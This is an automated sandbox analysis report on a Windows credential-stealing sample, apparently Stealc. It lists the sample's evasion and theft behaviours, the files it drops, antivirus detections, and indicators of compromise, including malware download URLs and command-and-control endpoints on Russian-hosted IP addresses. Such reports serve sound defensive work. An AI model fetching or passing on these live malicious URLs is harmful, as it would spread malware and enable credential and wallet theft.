                        behaviorgraph top1 signatures2 2 Behavior Graph ID: 1463419 Sample: wqmnYoVbHr.exe Startdate: 27/06/2024 Architecture: WINDOWS Score: 100 53 Snort IDS alert for network traffic 2->53 55 Multi AV Scanner detection for domain / URL 2->55 57 Found malware configuration 2->57 59 16 other signatures 2->59 8 wqmnYoVbHr.exe 37 2->8         started        13 explortu.exe 16 2->13         started        process3 dnsIp4 47 85.28.47.4, 49711, 49731, 80 GES-ASRU Russian Federation 8->47 49 77.91.77.81, 49714, 49729, 80 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU Russian Federation 8->49 35 C:\Users\user\AppData\...\AFHDAKJKFC.exe, PE32 8->35 dropped 37 C:\Users\user\AppData\...\softokn3[1].dll, PE32 8->37 dropped 39 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 8->39 dropped 45 11 other files (7 malicious) 8->45 dropped 77 Detected unpacking (changes PE section rights) 8->77 79 Tries to steal Mail credentials (via file / registry access) 8->79 81 Found many strings related to Crypto-Wallets (likely being stolen) 8->81 89 4 other signatures 8->89 15 cmd.exe 1 8->15         started        17 cmd.exe 2 8->17         started        51 147.45.47.155, 49728, 49730, 49733 FREE-NET-ASFREEnetEU Russian Federation 13->51 41 C:\Users\user\AppData\...\cb41bc9329.exe, PE32 13->41 dropped 43 C:\Users\user\AppData\Local\...\random[1].exe, PE32 13->43 dropped 83 Hides threads from debuggers 13->83 85 Tries to detect sandboxes / dynamic malware analysis system (registry check) 13->85 87 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 13->87 19 cb41bc9329.exe 12 13->19         started        file5 signatures6 process7 signatures8 22 AFHDAKJKFC.exe 4 15->22         started        26 conhost.exe 15->26         started        28 conhost.exe 17->28         started        61 Antivirus detection for dropped file 19->61 63 Multi AV Scanner detection for dropped file 19->63 65 Detected unpacking (changes PE section rights) 19->65 67 2 other signatures 19->67 process9 file10 33 C:\Users\user\AppData\Local\...\explortu.exe, PE32 22->33 dropped 69 Antivirus detection for dropped file 22->69 71 Detected unpacking (changes PE section rights) 22->71 73 Machine Learning detection for dropped file 22->73 75 6 other signatures 22->75 30 explortu.exe 22->30         started        signatures11 process12 signatures13 91 Antivirus detection for dropped file 30->91 93 Detected unpacking (changes PE section rights) 30->93 95 Tries to detect sandboxes and other dynamic analysis tools (window names) 30->95 97 5 other signatures 30->97

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        SourceDetectionScannerLabelLink
                        wqmnYoVbHr.exe53%ReversingLabsWin32.Spyware.Stealc
                        wqmnYoVbHr.exe43%VirustotalBrowse
                        wqmnYoVbHr.exe100%AviraTR/Crypt.ZPACK.Gen
                        wqmnYoVbHr.exe100%Joe Sandbox ML
                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\amadka[1].exe100%AviraTR/Crypt.TPM.Gen
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe100%AviraTR/Crypt.ZPACK.Gen
                        C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe100%AviraTR/Crypt.TPM.Gen
                        C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe100%AviraTR/Crypt.ZPACK.Gen
                        C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe100%AviraTR/Crypt.TPM.Gen
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\amadka[1].exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe100%Joe Sandbox ML
                        C:\ProgramData\freebl3.dll0%ReversingLabs
                        C:\ProgramData\mozglue.dll0%ReversingLabs
                        C:\ProgramData\msvcp140.dll0%ReversingLabs
                        C:\ProgramData\nss3.dll0%ReversingLabs
                        C:\ProgramData\softokn3.dll0%ReversingLabs
                        C:\ProgramData\vcruntime140.dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\mozglue[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\msvcp140[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\nss3[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe53%ReversingLabsWin32.Trojan.Generic
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\softokn3[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\vcruntime140[1].dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe53%ReversingLabsWin32.Trojan.Generic
                        No Antivirus matches
                        No Antivirus matches
                        SourceDetectionScannerLabelLink
                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                        http://upx.sf.net0%URL Reputationsafe
                        https://www.ecosia.org/newtab/0%URL Reputationsafe
                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
                        https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                        http://77.91.77.81/mine/amadka.exe100%Avira URL Cloudmalware
                        https://support.mozilla.org0%URL Reputationsafe
                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                        http://77.91.77.81/cost/go.exe100%Avira URL Cloudphishing
                        http://85.28.47.4/X100%Avira URL Cloudmalware
                        https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                        https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                        http://85.28.47.4/100%Avira URL Cloudmalware
                        http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl070%Avira URL Cloudsafe
                        http://85.28.47.4/69934896f997d5bb/vcruntime140.dllk100%Avira URL Cloudmalware
                        https://duckduckgo.com/ac/?q=0%VirustotalBrowse
                        http://77.91.77.81/mine/amadka.exe27%VirustotalBrowse
                        http://147.45.47.155/ku4Nor9/index.php100%Avira URL Cloudphishing
                        http://77.91.77.81/cost/go.exe26%VirustotalBrowse
                        http://85.28.47.4/15%VirustotalBrowse
                        http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsusersIncIEEERootCA.cr0%Avira URL Cloudsafe
                        http://147.45.47.155/ku4Nor9/index.php21%VirustotalBrowse
                        https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg0%Avira URL Cloudsafe
                        http://85.28.47.4/69934896f997d5bb/nss3.dll5100%Avira URL Cloudmalware
                        http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl070%VirustotalBrowse
                        https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
                        http://85.28.47.4/t100%Avira URL Cloudmalware
                        http://85.28.47.4/69934896f997d5bb/freebl3.dllW100%Avira URL Cloudmalware
                        http://85.28.47.4/69934896f997d5bb/softokn3.dll100%Avira URL Cloudmalware
                        http://85.28.47.4/920475a59bac849d.php8L100%Avira URL Cloudmalware
                        https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg0%VirustotalBrowse
                        http://85.28.47.4/69934896f997d5bb/mozglue.dll100%Avira URL Cloudmalware
                        http://85.28.47.4/69934896f997d5bb/vcruntime140.dll100%Avira URL Cloudmalware
                        http://85.28.47.4/69934896f997d5bb/nss3.dll100%Avira URL Cloudmalware
                        http://85.28.47.4/69934896f997d5bb/mozglue.dll7%VirustotalBrowse
                        http://85.28.47.4/920475a59bac849d.phpD100%Avira URL Cloudmalware
                        http://85.28.47.4/69934896f997d5bb/freebl3.dllM100%Avira URL Cloudmalware
                        http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsusersIncIEEERootCA.cr0%VirustotalBrowse
                        http://85.28.47.4/69934896f997d5bb/vcruntime140.dll7%VirustotalBrowse
                        http://85.28.47.4/69934896f997d5bb/softokn3.dll6%VirustotalBrowse
                        http://www.sqlite.org/copyright.html.0%Avira URL Cloudsafe
                        http://77.91.77.81/mine/amadka.exe00100%Avira URL Cloudphishing
                        http://85.28.47.4/69934896f997d5bb/nss3.dll9%VirustotalBrowse
                        http://www.mozilla.com/en-US/blocklist/0%Avira URL Cloudsafe
                        http://www.sqlite.org/copyright.html.0%VirustotalBrowse
                        http://85.28.47.4/69934896f997d5bb/freebl3.dll100%Avira URL Cloudmalware
                        https://mozilla.org0/0%Avira URL Cloudsafe
                        http://85.28.47.4/920475a59bac849d.php100%Avira URL Cloudmalware
                        https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.0%Avira URL Cloudsafe
                        https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                        http://www.mozilla.com/en-US/blocklist/0%VirustotalBrowse
                        http://77.91.77.81/mine/amadka.exe0025%VirustotalBrowse
                        http://85.28.47.4/920475a59bac849d.phpU100%Avira URL Cloudmalware
                        https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi0%Avira URL Cloudsafe
                        http://85.28.47.4/69934896f997d5bb/freebl3.dll6%VirustotalBrowse
                        http://85.28.47.4/920475a59bac849d.phpD14%VirustotalBrowse
                        http://85.28.47.4/69934896f997d5bb/sqlite3.dll100%Avira URL Cloudmalware
                        http://77.91.77.81/cost/go.exe00100%Avira URL Cloudphishing
                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                        http://85.28.47.4/920475a59bac849d.php19%VirustotalBrowse
                        http://77.91.77.81/mine/amadka.exepera100%Avira URL Cloudphishing
                        http://85.28.47.4/69934896f997d5bb/sqlite3.dll21%VirustotalBrowse
                        http://85.28.47.4/69934896f997d5bb/msvcp140.dll100%Avira URL Cloudmalware
                        https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_0%Avira URL Cloudsafe
                        https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
                        http://85.28.47.4100%Avira URL Cloudmalware
                        https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt0%Avira URL Cloudsafe
                        https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg0%Avira URL Cloudsafe
                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%VirustotalBrowse
                        http://pki-ocsp.symauth.com00%Avira URL Cloudsafe
                        http://77.91.77.81/cost/go.exe0025%VirustotalBrowse
                        http://85.28.47.4/69934896f997d5bb/softokn3.dllk100%Avira URL Cloudmalware
                        http://85.28.47.415%VirustotalBrowse
                        http://85.28.47.4/920475a59bac849d.phpr100%Avira URL Cloudmalware
                        http://85.28.47.4/69934896f997d5bb/msvcp140.dll9%VirustotalBrowse
                        https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b30%Avira URL Cloudsafe
                        http://77.91.77.81/cost/go.exeAppData100%Avira URL Cloudphishing
                        https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta0%Avira URL Cloudsafe
                        http://85.28.47.4/69934896f997d5bb/vcruntime140.dllS100%Avira URL Cloudmalware
                        No contacted domains info
                        NameMaliciousAntivirus DetectionReputation
                        http://77.91.77.81/mine/amadka.exetrue
                        • 27%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        http://147.45.47.155/ku4Nor9/index.phptrue
                        • 21%, Virustotal, Browse
                        • Avira URL Cloud: phishing
                        unknown
                        http://85.28.47.4/69934896f997d5bb/softokn3.dlltrue
                        • 6%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        http://85.28.47.4/69934896f997d5bb/mozglue.dlltrue
                        • 7%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        http://85.28.47.4/69934896f997d5bb/nss3.dlltrue
                        • 9%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        http://85.28.47.4/69934896f997d5bb/vcruntime140.dlltrue
                        • 7%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        http://85.28.47.4/69934896f997d5bb/freebl3.dlltrue
                        • 6%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        http://85.28.47.4/920475a59bac849d.phptrue
                        • 19%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        http://85.28.47.4/69934896f997d5bb/sqlite3.dlltrue
                        • 21%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        http://85.28.47.4/69934896f997d5bb/msvcp140.dlltrue
                        • 9%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://duckduckgo.com/chrome_newtabwqmnYoVbHr.exe, 00000000.00000003.2172883084.0000000001796000.00000004.00000020.00020000.00000000.sdmp, IDHIDBAE.0.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        https://duckduckgo.com/ac/?q=wqmnYoVbHr.exe, 00000000.00000003.2172883084.0000000001796000.00000004.00000020.00020000.00000000.sdmp, IDHIDBAE.0.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        http://77.91.77.81/cost/go.exewqmnYoVbHr.exe, 00000000.00000002.2290413954.0000000000626000.00000040.00000001.01000000.00000003.sdmptrue
                        • 26%, Virustotal, Browse
                        • Avira URL Cloud: phishing
                        unknown
                        http://85.28.47.4/Xcb41bc9329.exe, 0000000E.00000002.2784688006.0000000001BDA000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        unknown
                        http://85.28.47.4/cb41bc9329.exe, 0000000E.00000002.2784688006.0000000001BDA000.00000004.00000020.00020000.00000000.sdmp, cb41bc9329.exe, 0000000E.00000002.2784688006.0000000001BEC000.00000004.00000020.00020000.00000000.sdmptrue
                        • 15%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl07wqmnYoVbHr.exe, random[1].exe.13.dr, cb41bc9329.exe.13.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        http://85.28.47.4/69934896f997d5bb/vcruntime140.dllkwqmnYoVbHr.exe, 00000000.00000002.2291406262.0000000001851000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsusersIncIEEERootCA.crwqmnYoVbHr.exe, random[1].exe.13.dr, cb41bc9329.exe.13.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=wqmnYoVbHr.exe, 00000000.00000003.2172883084.0000000001796000.00000004.00000020.00020000.00000000.sdmp, IDHIDBAE.0.drfalse
                        • URL Reputation: safe
                        unknown
                        https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpgwqmnYoVbHr.exe, 00000000.00000002.2291406262.0000000001851000.00000004.00000020.00020000.00000000.sdmp, GHJKECAAAFHJECAAAEBF.0.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        http://85.28.47.4/69934896f997d5bb/nss3.dll5wqmnYoVbHr.exe, 00000000.00000002.2291406262.0000000001709000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        http://85.28.47.4/tcb41bc9329.exe, 0000000E.00000002.2784688006.0000000001BDA000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        http://85.28.47.4/69934896f997d5bb/freebl3.dllWwqmnYoVbHr.exe, 00000000.00000002.2291406262.0000000001720000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchwqmnYoVbHr.exe, 00000000.00000003.2172883084.0000000001796000.00000004.00000020.00020000.00000000.sdmp, IDHIDBAE.0.drfalse
                        • URL Reputation: safe
                        unknown
                        http://85.28.47.4/920475a59bac849d.php8LwqmnYoVbHr.exe, 00000000.00000002.2291406262.00000000016CE000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        http://85.28.47.4/69934896f997d5bb/freebl3.dllMwqmnYoVbHr.exe, 00000000.00000002.2291406262.0000000001720000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        http://85.28.47.4/920475a59bac849d.phpDcb41bc9329.exe, 0000000E.00000002.2784688006.0000000001BDA000.00000004.00000020.00020000.00000000.sdmpfalse
                        • 14%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        http://www.sqlite.org/copyright.html.wqmnYoVbHr.exe, 00000000.00000002.2310723689.000000001CCB3000.00000004.00000020.00020000.00000000.sdmp, wqmnYoVbHr.exe, 00000000.00000002.2323422296.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        http://77.91.77.81/mine/amadka.exe00wqmnYoVbHr.exe, 00000000.00000002.2290413954.0000000000626000.00000040.00000001.01000000.00000003.sdmptrue
                        • 25%, Virustotal, Browse
                        • Avira URL Cloud: phishing
                        unknown
                        http://www.mozilla.com/en-US/blocklist/wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        https://mozilla.org0/freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://www.google.com/images/branding/product/ico/googleg_lodp.icowqmnYoVbHr.exe, 00000000.00000003.2172883084.0000000001796000.00000004.00000020.00020000.00000000.sdmp, IDHIDBAE.0.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.wqmnYoVbHr.exe, 00000000.00000002.2291406262.0000000001851000.00000004.00000020.00020000.00000000.sdmp, GHJKECAAAFHJECAAAEBF.0.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://85.28.47.4/920475a59bac849d.phpUcb41bc9329.exe, 0000000E.00000002.2784688006.0000000001BEC000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiGHJKECAAAFHJECAAAEBF.0.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://77.91.77.81/cost/go.exe00wqmnYoVbHr.exe, 00000000.00000002.2290413954.0000000000626000.00000040.00000001.01000000.00000003.sdmptrue
                        • 25%, Virustotal, Browse
                        • Avira URL Cloud: phishing
                        unknown
                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=wqmnYoVbHr.exe, 00000000.00000003.2172883084.0000000001796000.00000004.00000020.00020000.00000000.sdmp, IDHIDBAE.0.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        http://upx.sf.netAmcache.hve.6.drfalse
                        • URL Reputation: safe
                        unknown
                        http://77.91.77.81/mine/amadka.exeperawqmnYoVbHr.exe, 00000000.00000002.2290413954.0000000000626000.00000040.00000001.01000000.00000003.sdmptrue
                        • Avira URL Cloud: phishing
                        unknown
                        https://www.ecosia.org/newtab/wqmnYoVbHr.exe, 00000000.00000003.2172883084.0000000001796000.00000004.00000020.00020000.00000000.sdmp, IDHIDBAE.0.drfalse
                        • URL Reputation: safe
                        unknown
                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brCBGCAFIIECBFIDHIJKFBAKEGDG.0.drfalse
                        • URL Reputation: safe
                        unknown
                        https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_wqmnYoVbHr.exe, 00000000.00000002.2291406262.0000000001851000.00000004.00000020.00020000.00000000.sdmp, GHJKECAAAFHJECAAAEBF.0.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://85.28.47.4wqmnYoVbHr.exe, 00000000.00000002.2291406262.00000000016CE000.00000004.00000020.00020000.00000000.sdmp, cb41bc9329.exe, 0000000E.00000002.2784688006.0000000001B9E000.00000004.00000020.00020000.00000000.sdmptrue
                        • 15%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        https://ac.ecosia.org/autocomplete?q=wqmnYoVbHr.exe, 00000000.00000003.2172883084.0000000001796000.00000004.00000020.00020000.00000000.sdmp, IDHIDBAE.0.drfalse
                        • URL Reputation: safe
                        unknown
                        https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYtCBGCAFIIECBFIDHIJKFBAKEGDG.0.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgwqmnYoVbHr.exe, 00000000.00000002.2291406262.0000000001851000.00000004.00000020.00020000.00000000.sdmp, GHJKECAAAFHJECAAAEBF.0.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://pki-ocsp.symauth.com0wqmnYoVbHr.exe, random[1].exe.13.dr, cb41bc9329.exe.13.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://85.28.47.4/920475a59bac849d.phprcb41bc9329.exe, 0000000E.00000002.2784688006.0000000001BEC000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        http://85.28.47.4/69934896f997d5bb/softokn3.dllkwqmnYoVbHr.exe, 00000000.00000002.2291406262.0000000001720000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3wqmnYoVbHr.exe, 00000000.00000002.2291406262.0000000001851000.00000004.00000020.00020000.00000000.sdmp, GHJKECAAAFHJECAAAEBF.0.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://support.mozilla.orgCBGCAFIIECBFIDHIJKFBAKEGDG.0.drfalse
                        • URL Reputation: safe
                        unknown
                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=wqmnYoVbHr.exe, 00000000.00000003.2172883084.0000000001796000.00000004.00000020.00020000.00000000.sdmp, IDHIDBAE.0.drfalse
                        • URL Reputation: safe
                        unknown
                        http://85.28.47.4/69934896f997d5bb/vcruntime140.dllSwqmnYoVbHr.exe, 00000000.00000002.2291406262.0000000001851000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&ctawqmnYoVbHr.exe, 00000000.00000002.2291406262.0000000001851000.00000004.00000020.00020000.00000000.sdmp, GHJKECAAAFHJECAAAEBF.0.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://77.91.77.81/cost/go.exeAppDatawqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000006CA000.00000040.00000001.01000000.00000003.sdmptrue
                        • Avira URL Cloud: phishing
                        unknown
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        147.45.47.155
                        unknownRussian Federation
                        2895FREE-NET-ASFREEnetEUtrue
                        77.91.77.81
                        unknownRussian Federation
                        42861FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRUtrue
                        85.28.47.4
                        unknownRussian Federation
                        31643GES-ASRUtrue
                        Joe Sandbox version:40.0.0 Tourmaline
                        Analysis ID:1463419
                        Start date and time:2024-06-27 05:57:09 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 9m 25s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:15
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Sample name:wqmnYoVbHr.exe
                        renamed because original name is a hash value
                        Original Sample Name:278754c8f6050d4bbf4d9a243f048429.exe
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winEXE@16/29@0/3
                        EGA Information:
                        • Successful, ratio: 50%
                        HCA Information:Failed
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Execution Graph export aborted for target AFHDAKJKFC.exe, PID 4876 because it is empty
                        • Execution Graph export aborted for target explortu.exe, PID 4632 because there are no executed function
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                        TimeTypeDescription
                        05:58:25Task SchedulerRun new task: explortu path: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
                        23:59:02API Interceptor149241x Sleep call for process: explortu.exe modified
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        147.45.47.155EZrw1nNIpG.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 147.45.47.155/ku4Nor9/index.php
                        setup.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                        • 147.45.47.155/ku4Nor9/index.php
                        SecuriteInfo.com.Win32.Evo-gen.11484.28734.exeGet hashmaliciousAmadeyBrowse
                        • 147.45.47.155/ku4Nor9/index.php
                        SecuriteInfo.com.Win32.Evo-gen.23207.8804.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                        • 147.45.47.155/ku4Nor9/index.php
                        SecuriteInfo.com.Win32.Evo-gen.8431.6571.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                        • 147.45.47.155/ku4Nor9/index.php
                        77.91.77.81EZrw1nNIpG.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                        • 77.91.77.81/stealc/random.exe
                        hsRju5CPK2.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, zgRATBrowse
                        • 77.91.77.81/Kiru9gu/index.php
                        setup.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                        • 77.91.77.81/Kiru9gu/index.php
                        setup.exeGet hashmaliciousAmadeyBrowse
                        • 77.91.77.81/Kiru9gu/index.php
                        mCTacyNuyM.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLineBrowse
                        • 77.91.77.81/Kiru9gu/index.php
                        yWny5Jds8b.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLineBrowse
                        • 77.91.77.81/Kiru9gu/index.php
                        setup.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLineBrowse
                        • 77.91.77.81/Kiru9gu/index.php
                        setup.exeGet hashmaliciousAmadeyBrowse
                        • 77.91.77.81/Kiru9gu/index.php
                        setup.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                        • 77.91.77.81/Kiru9gu/index.php
